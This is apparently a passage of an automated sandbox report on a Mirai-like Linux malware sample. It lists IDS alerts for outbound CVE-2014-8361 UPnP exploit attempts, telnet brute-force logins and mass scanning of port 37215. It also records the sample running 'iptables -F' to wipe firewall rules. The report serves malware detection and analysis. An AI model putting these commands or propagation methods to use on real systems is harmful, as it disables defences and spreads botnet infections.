    Source: /usr/bin/pkill (PID: 5278)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pkill (PID: 5284)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pkill (PID: 5286)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pulseaudio (PID: 5410)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pkill (PID: 5456)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pkill (PID: 5571)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50586 -> 41.194.8.47:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38424 -> 156.238.37.12:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:60690
    Source: TrafficSnort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59040
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:60690
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40048 -> 156.224.144.253:52869
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59040
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:60706
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37264 -> 156.224.184.120:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:32874 -> 156.224.186.0:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59068
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60672 -> 156.224.225.184:52869
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:60706
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59068
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60238 -> 156.237.4.71:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:60798
    Source: TrafficSnort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59166
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:60798
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35894 -> 156.224.231.224:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54748 -> 156.237.4.43:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47428 -> 41.137.43.57:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.20.225.64:23 -> 192.168.2.23:53772
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.20.225.64:23 -> 192.168.2.23:53772
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59166
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:60864
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45364 -> 156.224.133.31:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40198 -> 156.240.105.222:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46296 -> 156.238.37.7:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 220.82.194.50:23 -> 192.168.2.23:42092
    Source: TrafficSnort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59296
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34352 -> 156.224.195.193:52869
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:60864
    Source: TrafficSnort IDS: 2023452 ET TROJAN Possible Linux.Mirai Login Attempt (Zte521) 192.168.2.23:43926 -> 115.236.80.21:23
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:32800
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59296
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60080 -> 156.224.161.59:52869
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:32800
    Source: TrafficSnort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59476
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 14.188.134.188:23 -> 192.168.2.23:49364
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 14.188.134.188:23 -> 192.168.2.23:49364
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:32936
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59476
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53002 -> 156.224.254.62:52869
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:32936
    Source: TrafficSnort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59640
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54830 -> 156.224.169.221:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:33110
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59640
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50224 -> 156.230.25.53:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43062 -> 156.253.71.58:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46170 -> 156.224.189.120:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44702 -> 156.238.49.125:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50048 -> 156.232.90.190:52869
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:33110
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58386 -> 156.238.44.77:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59738
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:33176
    Source: TrafficSnort IDS: 716 INFO TELNET access 177.116.137.19:23 -> 192.168.2.23:53738
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59738
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:33176
    Source: TrafficSnort IDS: 716 INFO TELNET access 112.5.133.152:23 -> 192.168.2.23:59808
    Source: TrafficSnort IDS: 716 INFO TELNET access 220.82.194.50:23 -> 192.168.2.23:42604
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55360 -> 156.224.239.208:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.224.48.118:23 -> 192.168.2.23:33246
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 112.5.133.152:23 -> 192.168.2.23:59808
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 183.224.48.118:23 -> 192.168.2.23:33246
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44014 -> 41.78.122.116:52869
    Deletes all firewall rulesShow sources
    Source: /bin/sh (PID: 5272)Args: iptables -F
    Connects to many ports of the same IP (likely port scanning)Show sources
    Source: global trafficTCP traffic: 197.253.96.115 ports 2,5,6,8,9,52869
    Uses known network protocols on non-standard portsShow sources
    Source: unknownNetwork traffic detected: HTTP traffic on port 55398 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 57708 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50586 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60950 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 17012
    Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 57248 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37264 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37264 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58332 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 32874 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37264 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 32874 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 32874 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36250 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37264 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36250 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36250 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 32874 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35894 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47428 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35894 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36250 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37264 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35894 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45364 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59078 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 32874 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40198 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46296 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34352 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35894 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45364 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59078 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36250 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46296 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40198 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53918 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60080 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45364 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59078 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35894 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53918 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40198 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46296 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37264 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35938 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35938 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 32874 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53002 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53918 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36094 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35938 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 53002 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53002 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54830 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35938 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36250 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36094 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45364 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59078 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 53002 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43062 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46170 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46296 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40198 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44702 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35938 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35894 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46170 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58386 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36094 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46170 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58386 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53918 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58386 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53002 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46170 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58386 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36834 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36834 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35938 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36834 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46170 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36094 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44014 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58386 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36834 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37264 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53002 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 32874 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45364 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59078 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36834 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36250 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 46296 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40198 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46170 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53918 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58386 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35894 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35938 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36834 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36094 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53002 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46170 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58386 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36834 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45364 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59078 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 46296 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40198 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53918 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35938 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36094 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 52869
    Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
    Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
    Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.132.235.75:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.64.238.75:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.169.115.49:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.223.17.18:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.243.213.175:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.162.0.34:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.205.100.111:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.217.17.76:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.236.63.110:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.250.231.228:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.66.156.222:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.187.70.94:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.145.181.70:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.88.123.182:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.4.20.59:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.148.250.73:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.50.184.22:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.9.220.181:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.15.78.63:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.226.3.102:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.33.233.51:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.239.48.166:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.125.79.166:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.45.213.65:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.254.225.88:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.39.106.97:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.61.177.151:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.188.169.108:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.219.220.143:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.46.33.194:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.90.119.104:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.15.87.149:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.72.111.79:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.185.178.168:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.112.150.242:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.53.243.40:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.246.254.187:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.182.248.223:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.204.147.67:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.219.77.194:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.104.90.28:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.60.22.180:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.38.175.166:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.180.177.204:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.199.51.96:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.10.166.184:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.179.58.201:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.217.58.0:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.94.149.198:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.147.188.138:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.124.129.249:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 41.101.220.63:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.201.169.2:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 197.38.125.57:37215
    Source: global trafficTCP traffic: 192.168.2.23:48500 -> 156.2.59.4:37215
